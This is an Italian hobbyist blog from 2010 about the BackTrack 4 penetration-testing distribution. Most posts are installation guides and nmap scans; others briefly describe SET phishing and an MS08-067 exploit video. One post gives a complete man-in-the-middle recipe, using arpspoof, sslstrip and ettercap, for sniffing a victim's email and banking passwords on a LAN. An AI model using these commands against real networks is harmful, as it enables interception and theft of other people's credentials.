martedì 19 gennaio 2010

SET - Social Engineering Toolkit

Social Engineering Toolkit è un tools disponibile in BT, realizzato da David Kennedy serve per automatizzare gli attacchi di tipo social-engineering come per esempio la creazione di false email che contengono codice malevolo, che servono per violare il sistema operativo del pc vittima che riceve l'email dall'attaccante, e la possibilità di creare un web server trappola in grado di diffondere una applet java con codice malevolo. Vi linko il video di Backtrack.it dove viene effettuato un attacco SET con la creazione di una falsa email dove viene inviata alla vittima con un file pdf malevolo allegato, invece il secondo video creato da me, viene realizzato un sito trappola dove l'IP viene camuffato da un link inviato tramite email. Ecco il link del mio video WebSiteAttack





domenica 17 gennaio 2010

Nmap

"Vedete anche Trinity di Matrix usa Nmap"


Nmap
è un tools inserito in BT, che permette di effettuare scansioni di reti
per controllare la sicurezza della propria rete. Molti amministratori di rete trovano utile nmap per compiti come l'inventario della rete, la gestione dei programmi di aggiornamento del servizio, e il monitoraggio di accoglienza o di uptime del servizio. Nmap utilizza dei semplici pacchetti IP per determinare quali host sono disponibili sulla rete, quali servizi (nome di applicazione e versione) questi host offrono, quali i sistemi operativi (e versioni del sistema operativo) sono in esecuzione, che tipo di filtri di pacchetti / firewall sono in uso, e decine di altre caratteristiche. È stato progettato per velocizzare la scansione di reti di grandi dimensioni, ma funziona bene anche contro singoli host (Linux, Windows, e Mac OS X. Nmap viene eseguito su tutti i principali sistemi operativi per computer, i pacchetti ufficiali sono disponibili per Linux, Windows e Mac OS X. Vi elenco alcuni comandi di nmap utili per effettuare una scansione di rete, comunque vi consiglio di leggervi le guide online su http://nmap.org/. Avviate nmap da shell e date i seguenti comandi:

morfes@morfes:~$ nmap --help
Nmap 5.00 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP or SCTP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO[protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
--traceroute: Trace hop path to each host
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sY/sZ: SCTP INIT/COOKIE-ECHO scans
-sO: IP protocol scan
-b : FTP bounce scan
PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take

questo è l'help di nmap dove potete vedere tutte le sue opzioni

morfes@morfes:~$ nmap 192.168.1.0/24

comando per scansionare il range degli ip della nostra rete lan

morfes@morfes:~$ nmap -sV -T Aggressive 192.168.1.103 -v

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-17 22:42 CET
NSE: Loaded 3 scripts for scanning.
Initiating Ping Scan at 22:42
Scanning 192.168.1.103 [2 ports]
Completed Ping Scan at 22:42, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:42
Completed Parallel DNS resolution of 1 host. at 22:42, 0.05s elapsed
Initiating Connect Scan at 22:42
Scanning 192.168.1.103 [1000 ports]
Discovered open port 139/tcp on 192.168.1.103
Discovered open port 1025/tcp on 192.168.1.103
Discovered open port 445/tcp on 192.168.1.103
Discovered open port 135/tcp on 192.168.1.103
Completed Connect Scan at 22:42, 0.22s elapsed (1000 total ports)
Initiating Service scan at 22:42
Scanning 4 services on 192.168.1.103
Completed Service scan at 22:42, 6.02s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.1.103.
NSE: Script Scanning completed.
Host 192.168.1.103 is up (0.0020s latency).
Interesting ports on 192.168.1.103:
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
Service Info: OS: Windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds


comando per una scansione approfondita di un indirizzo ip, dove vengono rilevate le porte aperte con i relativi servizi e il sistema operativo dell'host!



giovedì 14 gennaio 2010

Installare Tor e Privoxy


Installare Tor e Privoxy su Ubuntu, Debian e Backtrack 4, se volete utilizzare un proxy web per navigare in anonimato, vi consiglio di installare Tor insieme a Privoxy, tor è il miglior proxy web per la navigazione anonima. Per installare Tor e Privoxy seguite questa guida Installare TOR e Privoxy su Debian e Ubuntu, un' ottima guida dove contiene anche un script per avviare, stoppare e riavviare Tor e Privoxy, la guida può essere utilizzata anche per Backtrack 4, però vi consiglio di installa tor e privoxy da Gestore Pacchetti Synaptic o da shell apt-get install tor privoxy senza inserire alcuno repository come dice la guida per evitare di compromettere i repository di backtrack. Installato Tor e Privoxy su BT4 possiamo fare un collegamento su Menu K - Services - Proxy dove andrà inserito anonymity.

AGGIORNAMENTO

Possiamo anche installare tor per i sistemi linux seguendo la documentazione del sito ufficiale di tor qui, spiega come installare tor dai repository o compilando i sorgenti, vi sono anche già pronti i file di configurazione per polipo e privoxy.



martedì 12 gennaio 2010

ExploitMs08_067 con FrameWork 3






Questo video dimostra una famosissima vulnerabilità di Windows "ms08_067", quindi se usate ancora sistemi operativi Windows 2000 o XP fino al SP2 vi consiglio di tenerli sempre aggiornati, di installare la patch per ms08_067 sul sito della Microsoft che andrà a correggere la falla del servizio di rete e di utilizzare altri tipi di firewall non quello di windows.

Ecco il link del video su youtube EXploitMs08_067


lunedì 11 gennaio 2010

BackTrack 4 Final


Sono lieto di annunciarvi l'uscita di BackTrack 4 Final, scaricabile dal suo nuovo sito BackTrack Linux, un sito dalla grafica stupenda e ricco già di tutorial, con il suo nuovo blog e forum. Visitatelo e buon divertimento a tutti con la BackTrack 4.



domenica 10 gennaio 2010

Ssl-Strip con Ettercap

SslStrip assieme ad Ettercap permette di sniffare password durante l'accesso in siti con cifratura ssl, siti che dovrebbero essere sicuri ad un eventuale attacco, quindi se un malintenzionato entra nella vostra rete privata, dovuta ad una mancanza di protezione della vostra rete wireless, potrebbe venire in possesso dei vostri account email e password di hotmail, gmail, facebook e anche bancari. Illustrerò la configurazione di SsLStrip corredata di video dimostrativo pubblicato su youtube da Backtrack.it dove potete vedere altri stupendi video dimostrativi come quelli per Ettercap, questo è un tutorial dimostrativo non mi assumo nessuna responsabilità per un eventuale uso illegale.

Rileviamo la nostra interfaccia di rete wireless o ethernet

root@morfes:~# ifconfig wlan1

configuriamo gli iptables del nostro firewall

root@morfes:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@morfes:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

effettuiamo con nmap una scansione dei range degli ip della nostra rete partendo dall'ip del router, per poter trovare l'ip del nostro pc vittima

root@morfes:~# nmap 192.168.1.1-254

avviamo arpspoof
è mettiamo l'interfaccia di rete, l'ip vittima e l'ip del router

root@morfes:~# arpspoof -i wlan1 -t 192.168.1.101 192.168.1.1

avviamo sslstrip da un'altro terminale è digitiamo

root@morfes:~# sslstrip -a

sempre da shell avviamo ettercap
, ma prima dobbiamo modificare il file di configurazione di etter.conf in /etc/ ovviamente logati da root cosi:

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

togliendo i #

# if you use ipchains:
redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

adesso avviamo ettercap e digitiamo

root@morfes:~# ettercap -T -q -i wlan1

da questo momento in poi quando entriamo nei nostri account email dal pc vittima, sniffiamo tutte le password! :)




MetasploitFramework - Milw0rm - Exploitdb


Metasploit Framework è un progetto realizzato per fornire informazioni sulle vulnerabilità, rilevamento di intrusioni e per semplificare le operazioni di penetration testing. Metasploit si divide in due progetti framework2 e framework3, il 2 è stato abbandonato. Framework è un insieme di strumenti per lo sviluppo e l'esecuzione di exploits, shellcodes, auxiliary e opcode, per maggiori informazioni visitate il sito di Metasploit, invece per una guida in italiano visitate il sito di Backtrack.it, qui troverete un file in pdf che spiega l'utilizzo di Metasploit e altre interessanti guide come quella di Milw0rm. Potete anche seguire il corso online di Metasploit Unleashed offerto dal team di Offensive Security.




Milw0rm è un sito che archivia tutte le vulnerabilità, exploits e shellcodes appena scoperti, un punto di riferimento per tenersi aggiornati sulle vulnerabilità dei sistemi operativi, cms e web server, ovviamente per maggiori informazioni visitate il sito di Milw0rm o la guida in pdf su Backtrack.it.




Exploitdb è il nuovo sito di archiviazione degli exploits che ha sostituito il vecchio Milw0rm, creato dall' Offensive Security visitate il sito è molto interessante Exploitdb.

Questo è tutto, ciao a tutti!

venerdì 8 gennaio 2010

Installare VMware Server su BT


Vmware Server è un potente virtual machines che permette di virtualizzare sistemi operativi sia windows che linux, è molto utile installarlo su BT4 specialmente se dobbiamo fare penetration test su più vari sistemi operativi ma abbiamo solo una o due macchine fisiche "computer". L'installazione richiede una registrazione gratuita al sito VMware per ottenere la chiave di licenza, per installarlo seguite il video dell' Offensive Security, fate molta attenzione durante l'installazione ci sono alcuni accorgimenti da effettuare rispetto al video. Inanzitutto scaricate il pacchetto vmware-server.tar.gz dal sito, una copia salvatela in /tmp/vmware come da video, arrivati alla parte in cui vi chiede che interfaccia di rete volete utilizzare per l'host cioè il pc che avvierà la virtual machine quindi BT4 scegliete eth0 di default se vi collegate via cavo o mettete wlan0, wlan1 se utilizzate una scheda wifi. Completata l'installazione VMware si avvierà automaticamente come Nessus all'avvio di Bt4, utilizziamo rcconf per disattivare l'avvio automatico, per avviare e stoppare vmware diamo da shell

root@morfes:~# /etc/init.d/vmware start

root@morfes:~# /etc/init.d/vmware stop

sul browser scriviamo https://127.0.0.1:8333 per far partire l'interfaccia web di VMware Server accettiamo il certificato SSL, prima di installare il nostro sistema operativo virtuale, dobbiamo scegliere quale modalità dare al network adapter bridged o nat, io vi consiglio bridged perchè se avete attivato dal vostro router il servizio DCHP assegnerà in automatico l'indirizzo ip della vostra rete privata invece nat creererà una nuova rete privata quindi non adatta per fare penetration test, vi linko una guida che spiega il networkig della vmware server "Networking con VMWARE Server" , anche se si riferisce per la versione di windows. Installato e avviato il nostro sistema operativo virtuale, avremo problemi con la funzionalità della tastiera, infatti vmware server versione linux la keyboard non funziona bene, per risolvere il problema andiamo su /usr/lib/vmware/ e con un editor di testo "Kate" apriamo il file config e inseriamo xkeymap.nokeycodeMap = "TRUE" salviamo e avremo la tastiera funzionante tranne per il tasto "Alt Gr" che non viene riconosciuto. Questa procedura d'installazione della VMware Server credo possa funzionare anche per Ubuntu! Ciao a tutti alla prossima!





Aggiornamento


Con la nuova BT4 final la procedura per installare la VMware Server come da video non funziona, in quanto il kernel della BT4 Final è cambiato, quindi bisogna ricompilare la VMware una procedura non semplice, quindi vi consiglio di installarvi direttamente VMware Player o Workstation con questi semplici comandi:

root@morfes:~# chmod 755 VMware-Player-3.0.0-203739.i386.bundle

root@morfes:~# ./VMware-Player-3.0.0-203739.i386.bundle




giovedì 7 gennaio 2010

Installare Nessus su BT



Salve vi spiegherò come installare
Nessus su BT4, uno dei migliori software in grado di trovare tutte le vulnerabilità dei nostri sistemi operativi, è ottimo anche per Ubuntu e altre distro di Linux. Questo software è gratuito per gli utenti e commerciale per i professionisti, ci occuperemo della versione gratuita che richiede solo una semplice registrazione dal sito http://www.nessus.org/plugins/ per avere la chiave di licenza. Nessus è composto da un pacchetto server e da un pacchetto client debian che vanno installati. Per la procedura di installazione vedete il video dell'Offensive Security dal forum di backtrack, dopo l'installazione nessus è impostato per avviarsi automaticamente all'avvio di BT, possiamo disattivare l'avvio di nessus installando da terminale rcconf

morfes@morfes:~$ sudo apt-get install rcconf

l'avvio

morfes@morfes:~$ sudo rcconf



andiamo su nessusd è togliamo * con la barra spaziatrice diamo OK con il tasto TAB, per avviare e stoppare nessus quando abbiamo bisogno di utilizzarlo diamo questi comandi

morfes@morfes:~$ sudo /etc/init.d/nessusd start

morfes@morfes
:~$ sudo /etc/init.d/nessusd stop

possiamo crearci anche dei collegamenti nel Menu K - Services, da menu k tasto destro Editor menu, il pannello deve essere sbloccato.
Dopo aver installato Nessus ed avviato, andiamo su Menu K - Internet - NessusClient clicchiamo su Connect e + comparirà una finestra "Edit Connection", inseriamo su Connection name: localhost, Host name: 127.0.0.1, Port: 1241 di default, Login e Password la stessa che abbiamo creato durante l'installazione di Nessus, una volta connessi selezioniamo + su Network(s) to scan: inseriamo l'indirizzo ip del pc sul quale vogliamo testare le vulnerabilità, selezioniamo + su Select a scan policy: possiamo salvare anche con le impostazioni di default, selezioniamo l'ip, lo scan policy e clicchiamo su Scan Now partirà la scansione!

mercoledì 6 gennaio 2010

Connettersi ad internet con BT4

Salve a tutti spiegherò come connettersi ad internet con BT4, possiamo utilizzare wicd inserito di default in BT come viene mostrato nei video di Tutorial ed HowTo del forum, utilizzando da shell i seguenti comandi

root@morfes:~# /etc/init.d/wicd start

questo è il comando che permette di avviare wicd, un software che ti permette di collegarti tramite wireless o rete ethernet, andiamo in Menu K - Internet - Wicd Network Manager, dopo essersi connessi diamo questo comando

root@morfes:~# update-rc.d wicd defaults

potete utilizzare anche altri comandi per connettervi come

root@morfes:~# /etc/init.d/networking start

Se invece utilizzate dei telefonini umts o chiavette, potete installare kppp-Kde3 o umtsmon, prima vedete se il vostro dispositivo viene riconosciuto da BT date questo comando lsusb, se comparirà i parametri del produttore il dispositivo è riconosciuto da BT. Ecco il link dove potete scaricare i pacchetti per umtsmon http://umtsmon.sourceforge.net/downloads.shtml qui trovate tutte le versioni per linux, ma potete utilizzare quello per ubuntu in formato .deb scaricabile da qui http://www.to-st.de/download/linux/eeep … 2_i386.deb. Per installarlo dal terminale date

dpkg -i umtsmon_0.9-2_i386.deb

Se installate Kppp dovete configurarlo in base al vostro operatore telefonico, eccovi una guida http://forum.ubuntu-it.org/index.php?PHPSESSID=3df5c94bc4a15013ae868ef8d1fc77 5c&/topic,73113.0.html. Buona navigazione a tutti!

Dimenticavo quando fate l'upgrades dei tools e delle librerie di backtrack da gestore pacchetti synaptic o da shell, potete avere problemi con il postgresql-8.3 che vi richiede il nuovo certificato di SSL, per risolvere il problema date questi comandi da shell ovviamente logati da root

root@morfes:~# cd /etc/ssl/certs
root@morfes:/etc/ssl/certs# make-ssl-cert generate-default-snakeoil --force-overwrite
root@morfes:~# /etc/init.d/postgresql-8.3 restart

cosi abbiamo risolto il problema, possiamo avere anche il problema con samdump2 visualizzando questo errore /var/cache/apt/archives/samdump2_2.0.1-bt0_i386.deb: trying to overwrite `/opt/kde3/share/applications/external/samdump2.desktop', which is also in package samdump2-menu, risolviamo cosi

root@morfes:~# dpkg -r samdump2 samdump2-menu
root@morfes:~# dpkg -i /var/cache/apt/archives/samdump2_2.0.1-bt0_i386.deb

Spero di esservi stato di aiuto, alla prossima!



Installare BT4 in persistent-mode su USB




Per installare BT4 in modalità persistente su pendrive vedete il video BackTrack LiveUSB in persistent-install nel forum di BackTrack, io vi consiglio di installarlo in una pendrive di almeno 4Gb o più. Tale procedura si effettua tramite shell, io ho effettuato la stessa procedura sia da shell che da interfaccia grafica, visto che ho avuto qualche problema tramite shell durante l'installazione.

Ecco la procedura che ho effettuato per installarla su pendrive, prendete una pendrive di almeno 3 o 4GB ma anche di più GB se volete, nel video prima di creare le due partizioni fat32 e ext3 la pendrive non deve avere nessuna partizione, cioè spazio non allocato, quindi come facciamo a togliere la nostra partizione di fat o di ntfs? E qui che entra in gioco il meraviglioso editor di partizione Gparted inserito di default in BT, dove grazie alle sua intuitiva interfaccia grafica possiamo creare le due partizioni, bisogna dire che nel video viene partizionata una pendrive di 4GB dividendo 1,5GB ciascuno le due partizioni lasciando più di 800MB non partizionato. Avendo anche io una pendrive di 4GB ho potuto partizionare con Gparted a mia libera scelta 2,8GB per la fat32 e 1,2GB per ext3 senza lasciare nessun spazio vuoto. Partizionato e formattato le due partizione mettendo le stesse label del video quindi BT4 e casper-rw, andiamo su Menu K - Sistema - Dispositivi di archivazione e montiamo la partizione BT4 dopo copiamo dal cd di BT4 tutto il suo contenuto sulla partizione fat32 semplicemente con copia e incolla! questa procedura tramite shell ho trovato un pò di difficoltà in quanto il mio lettore cd monta su cdrom0 e non su cdrom come nel video, dopo aver copiato tutto dal cd a BT4 diamo solo questo comando tramite shell

grub-install --no-floppy --root-directory=/mnt/sdb1 /dev/sdb

ma attenzione questo comando con me non ha funzionato in quanto la mia partizione BT4 viene montata su /media/BT4 e non su /mnt/sdb1 quindi controllate da proprietà della vostra partizione dove viene montata! Per finire non vi resta che modificare come da video il file menu.lst dalla cartella grub boot della partizione fat32 semplicemente da interfaccia grafica e non da shell, ah dimenticavo dovete essere logati come root! Io personalmente ho modificato il menu.lst mettendo al primo posto l'avvio da Live USB, semplicemente tagliando e copiando Live CD al primo posto!

Installare BT4 su HD

L'installazione di BT4 non è molto complicata, in quanto questa versione è stata rilasciata su base Debian, quindi l'installazione è simile ad ubuntu, vi posto il link del video di Offensive Security che vi spiega come installare BT4 su hard disk. Ecco il video Install Backtrack to Hard Disk, nella sezione Tutorial ed HowTo del forum di Backtrack Italian Community troverete altri video.

Dopo aver installato BT sul vostro pc, dovrete inserire il vostro nome utente e password che avete inserito durante la procedura d'installazione e digitare

morfes@morfes:~# startx

per avviare il Kde "l' interfaccia grafica di Backtrack", per poter utilizzare tutti i tools disponibili in BT bisogna essere logati come root, quindi dobbiamo crearci l'utente root, avviamo BT e da shell dopo aver effettuato il login digitiamo

morfes@morfes:~# sudo su

digitiamo la nostra password utente e

root@morfes:/home/morfes# passwd

qui ci chiedera di inserire una nuova password per l'utente root, non mettete la stessa password dell'utente creato durante l'installazione. Avviato startx troviamo il Kde in inglese, per impostarlo in italiano dobbiamo andare in Menu K - Sistema - Gestore Pacchetti Synaptic e installare il pacchetto language-pack-kde-it, andare in Impostazione - Regionali e Accesso facilitato - Lingua e paese è impostate la lingua italiana.

Quando ci loghiamo come utente vediamo che l'audio non funziona, questo perchè mancano i privileggi, loghiamoci come root e andiamo in Sistema - Utenti e gruppi selezioniamo l'utente esempio il mio è morfes, Properties - User Privileges e spuntiamo Use audio devices, al riavvio avremo l'audio.

martedì 5 gennaio 2010

Backtrack




Salve a tutti questo è il mio primo argomento che scrivo sul mio blog, oggi parlerò della distro linux backtrack, una security distro sviluppata per penetration testing e per la sicurezza delle reti, utilizzata da molti sysadmin "amministratori di rete" e da coloro che vogliono testare la propria rete, il proprio sistema operativo linux o windows, i vari cms e web server. L'ultima versione di backtrack è la 4 prefinal, ben presto uscirà la final, potete scaricarla dal sito remote-exploit, il sito del team di sviluppo di questa stupenda distro, che mette a disposizione anche dei corsi per l'utilizzo dei tools inseriti in BT e per la certificazione OSCP, OSCE, OSWP disponibili nel sito di Offensive Security.

La distro può essere utilizzata in vari modi come liveCD o installa su HD e pendrive sia live che persistente, essa è supportata dalla community di backtrack-IT e dal suo forum ufficiale internazionale. Nel prossimo post parlerò dell'installazione, dell'utilizzo della BT4 prefinal e della configurazione di alcuni tools.